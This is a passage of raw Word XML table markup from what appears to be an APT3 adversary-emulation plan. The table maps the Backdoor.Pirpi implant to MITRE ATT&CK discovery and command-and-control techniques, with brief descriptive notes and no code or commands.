          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BD9ACA0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="157083D9" w14:textId="7156B691" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43A41654" w14:textId="4A33448D" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F95F9A" w14:textId="276A8093" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B679FC">
              <w:t>Backdoor.Pirpi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="1C861CE4" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A2C0F73" w14:textId="6087E9CE" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67598E89" w14:textId="7E7672BE" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71BDFCDA" w14:textId="2CA34731" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="209A244B" w14:textId="1F4331A4" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62324D1E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="472DD536" w14:textId="26A6C759" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546F16B4" w14:textId="19E430D6" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C6DFD7" w14:textId="3C40C32A" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069312B">
              <w:t>Backdoor.Pirpi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069312B">
              <w:t xml:space="preserve"> also collects information about the target’s local network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="52947C5A" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A1BE31" w14:textId="592172F4" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190A3339" w14:textId="41048492" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375BC7E2" w14:textId="11D1692C" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1016 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006243FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570FE917" w14:textId="6FD43099" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4427A820" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215872F7" w14:textId="673A5FBF" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186DF5D8" w14:textId="13FBF661" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7D14D1" w14:textId="1B8BF25C" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069312B">
              <w:t>Backdoor.Pirpi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069312B">
              <w:t xml:space="preserve"> also collects information about the target’s local network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="75ABDD20" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="476EC0A0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE0A724" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B791B4C" w14:textId="2E3D5E40" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92F01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D92F01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1095 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D92F01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4018F8F8" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30BFD627" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36CDE7B4" w14:textId="457807FD"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19140B14" w14:textId="03034D79" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F9AE98" w14:textId="73A5C06E" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E74707">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">We do not have specific info here but we know that this technique is attributed to APT3 and we know that the backdoor must be communicating back. See also </w:t>
            </w:r>
            <w:r w:rsidRPr="00E74707">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Implant Command and Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00E74707">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> emulation notes on C2 below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="54086141" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2A51D7" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68928B15" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58EE86B5" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51B2C50A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F8223C2" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21705127" w14:textId="28D75A71"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523DF111" w14:textId="53D6B8F3" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D55EA40" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="1D6F6419" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55072AA3" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EFB9EA3" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66018A83" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642B9F60" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09B604C7" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0112AA09" w14:textId="68B5593F"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788E1344" w14:textId="0ED12CF2" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D861F65" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="29152010" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E04FD99" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3081ADE0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F8354D" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4221BD63" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43106CF2" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
